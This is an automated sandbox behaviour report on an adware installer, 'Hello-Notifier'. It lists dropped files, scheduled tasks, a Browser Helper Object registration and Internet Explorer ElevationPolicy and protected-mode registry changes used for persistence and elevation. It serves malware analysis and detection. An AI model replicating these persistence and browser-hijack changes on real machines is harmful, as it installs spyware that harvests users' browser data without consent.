N/A N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A

Reads user/profile data of web browsers

spyware stealer

Checks installed software on the system

discovery

Installs/modifies Browser Helper Object

stealer adware
Description Indicator Process Target
Key deleted \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-1111-1111-1111-110311791128} C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-1111-1111-1111-110311791128} C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-1111-1111-1111-110311791128} C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-1111-1111-1111-110311791128}\ = "CrossriderApp0037928" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-1111-1111-1111-110311791128}\NoExplorer = "1" C:\Windows\system32\regsvr32.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-1111-1111-1111-110311791128} C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-1111-1111-1111-110311791128}\NoExplorer = "1" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-1111-1111-1111-110311791128}\ = "CrossriderApp0037928" C:\Windows\system32\regsvr32.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-buttonutil64.dll C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
File created C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
File created C:\Program Files (x86)\Hello-Notifier\37928.xpi C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
File created C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-helper.exe C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
File created C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
File created C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-buttonutil64.exe C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
File created C:\Program Files (x86)\Hello-Notifier\Installer.log C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
File created C:\Program Files (x86)\Hello-Notifier\utils.exe C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
File created C:\Program Files (x86)\Hello-Notifier\Uninstall.exe C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
File created C:\Program Files (x86)\Hello-Notifier\Hello-Notifier.ico C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
File created C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-bho.dll C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
File created C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-bg.exe C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
File created C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-updater.exe C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
File created C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-buttonutil.exe C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
File created C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-buttonutil.dll C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
File created C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-bho64.dll C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
File created C:\Program Files (x86)\Hello-Notifier\background.html C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
File opened for modification C:\Program Files (x86)\Hello-Notifier\Uninstall.exe C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
File created C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-firefoxinstaller.exe C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Tasks\Hello-Notifier-enabler.job C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
File opened for modification C:\Windows\Tasks\temp_Hello-Notifier-enabler.job C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
File created C:\Windows\Tasks\Hello-Notifier-updater.job C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
File opened for modification C:\Windows\Tasks\Hello-Notifier-updater.job C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
File created C:\Windows\Tasks\Hello-Notifier-firefoxinstaller.job C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
File opened for modification C:\Windows\Tasks\Hello-Notifier-firefoxinstaller.job C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
File created C:\Windows\Tasks\Hello-Notifier-codedownloader.job C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
File opened for modification C:\Windows\Tasks\Hello-Notifier-codedownloader.job C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
File created C:\Windows\Tasks\Hello-Notifier-enabler.job C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
File created C:\Windows\Tasks\temp_Hello-Notifier-enabler.job C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-firefoxinstaller.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\regsvr32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-bg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1999c56ab4a4e37c0c4b35f1a859926b1a5c082a12167106de4f955de3f83d25N.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\regsvr32.exe N/A

NSIS installer

installer
Description Indicator Process Target
N/A N/A N/A N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7e5bffe2-2164-4778-8938-2ec4e833d3e0}\AppPath = "C:\\Program Files (x86)\\Hello-Notifier" C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{cbc148be-08f7-4781-8fc7-fd545f7678f0}\AppName = "Hello-Notifier-helper.exe" C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{d0007729-ce2c-4588-ad99-017a0258ae89}\Policy = "3" C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{12835ba8-ee00-4d15-b54a-a933332b83e4}\AppName = "Hello-Notifier-bg.exe" C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{718F2CC1-8611-4C30-858F-4FA0ECD619AD} C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7e5bffe2-2164-4778-8938-2ec4e833d3e0}\AppName = "Hello-Notifier-codedownloader.exe" C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8e0202ae-cd8e-4894-b24e-f2cd7839a7f0} C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8e0202ae-cd8e-4894-b24e-f2cd7839a7f0}\Policy = "3" C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8e0202ae-cd8e-4894-b24e-f2cd7839a7f0}\Policy = "3" C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
Key created \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{12835ba8-ee00-4d15-b54a-a933332b83e4} C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{12835ba8-ee00-4d15-b54a-a933332b83e4}\AppPath = "C:\\Program Files (x86)\\Hello-Notifier" C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\AdvancedOptions\CRYPTO\PROTECTEDMODESECURITY\CheckedValue = "PMIL" C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe N/A
Key created \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7e5bffe2-2164-4778-8938-2ec4e833d3e0} C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7e5bffe2-2164-4778-8938-2ec4e833d3e0}\AppPath = "C:\\Program Files (x86)\\Hello-Notifier" C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{cbc148be-08f7-4781-8fc7-fd545f7678f0} C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{cbc148be-08f7-4781-8fc7-fd545f7678f0}\Policy = "3" C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{cbc148be-08f7-4781-8fc7-fd545f7678f0}\Policy = "3" C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{12835ba8-ee00-4d15-b54a-a933332b83e4}\Policy = "1" C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{12835ba8-ee00-4d15-b54a-a933332b83e4}\Policy = "1" C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7e5bffe2-2164-4778-8938-2ec4e833d3e0}\Policy = "3" C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{d0007729-ce2c-4588-ad99-017a0258ae89} C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{d0007729-ce2c-4588-ad99-017a0258ae89}\AppPath = "C:\\Program Files (x86)\\Hello-Notifier" C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{12835ba8-ee00-4d15-b54a-a933332b83e4}\AppPath = "C:\\Program Files (x86)\\Hello-Notifier" C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{AF5263F2-24A4-44CE-BF3C-C5AA3262B51}\AppPath = "C:\\Program Files (x86)\\Hello-Notifier" C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe N/A
Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Internet Explorer\Approved Extensions C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\CRYPTO\PROTECTEDMODESECURITY\CheckedValue = "PMIL" C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{cbc148be-08f7-4781-8fc7-fd545f7678f0}\AppName = "Hello-Notifier-helper.exe" C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8e0202ae-cd8e-4894-b24e-f2cd7839a7f0}\AppPath = "C:\\Program Files (x86)\\Hello-Notifier" C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{d0007729-ce2c-4588-ad99-017a0258ae89} C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{d0007729-ce2c-4588-ad99-017a0258ae89}\Policy = "3" C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{12835ba8-ee00-4d15-b54a-a933332b83e4} C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{d0007729-ce2c-4588-ad99-017a0258ae89}\AppName = "Hello-Notifier-buttonutil64.exe" C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Isolation = "PMIL" C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe N/A
Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7DCF6270-3651-47F3-9FB9-4FF41A7ECC5} C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7DCF6270-3651-47F3-9FB9-4FF41A7ECC5}\AppName = "Hello-Notifier-enabler.exe-codedownloader.exe" C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{AF5263F2-24A4-44CE-BF3C-C5AA3262B51}\AppName = "Hello-Notifier-enabler.exe-buttonutil64.exe" C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\CRYPTO\PROTECTEDMODESECURITY\DefaultValue = "PMIL" C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7e5bffe2-2164-4778-8938-2ec4e833d3e0}\AppName = "Hello-Notifier-codedownloader.exe" C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8e0202ae-cd8e-4894-b24e-f2cd7839a7f0}\AppPath = "C:\\Program Files (x86)\\Hello-Notifier" C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{d0007729-ce2c-4588-ad99-017a0258ae89}\AppPath = "C:\\Program Files (x86)\\Hello-Notifier" C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{718F2CC1-8611-4C30-858F-4FA0ECD619AD}\AppPath = "C:\\Program Files (x86)\\Hello-Notifier" C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe N/A
Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{2AC4E7B1-83BE-4E44-9252-46C4429AC346} C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{2AC4E7B1-83BE-4E44-9252-46C4429AC346}\AppName = "Hello-Notifier-enabler.exe-buttonutil.exe" C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe N/A
Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{AF5263F2-24A4-44CE-BF3C-C5AA3262B51} C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7e5bffe2-2164-4778-8938-2ec4e833d3e0}\Policy = "3" C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7e5bffe2-2164-4778-8938-2ec4e833d3e0} C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7e5bffe2-2164-4778-8938-2ec4e833d3e0}\AppPath = "C:\\Program Files (x86)\\Hello-Notifier" C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8e0202ae-cd8e-4894-b24e-f2cd7839a7f0}\AppName = "Hello-Notifier-buttonutil.exe" C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Hello-Notifier-bg.exe = "8000" C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7e5bffe2-2164-4778-8938-2ec4e833d3e0}\Policy = "3" C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7e5bffe2-2164-4778-8938-2ec4e833d3e0}\AppName = "Hello-Notifier-codedownloader.exe" C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{cbc148be-08f7-4781-8fc7-fd545f7678f0} C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
Key created \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{d0007729-ce2c-4588-ad99-017a0258ae89} C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7DCF6270-3651-47F3-9FB9-4FF41A7ECC5}\AppPath = "C:\\Program Files (x86)\\Hello-Notifier" C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7DCF6270-3651-47F3-9FB9-4FF41A7ECC5}\Policy = "3" C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe N/A
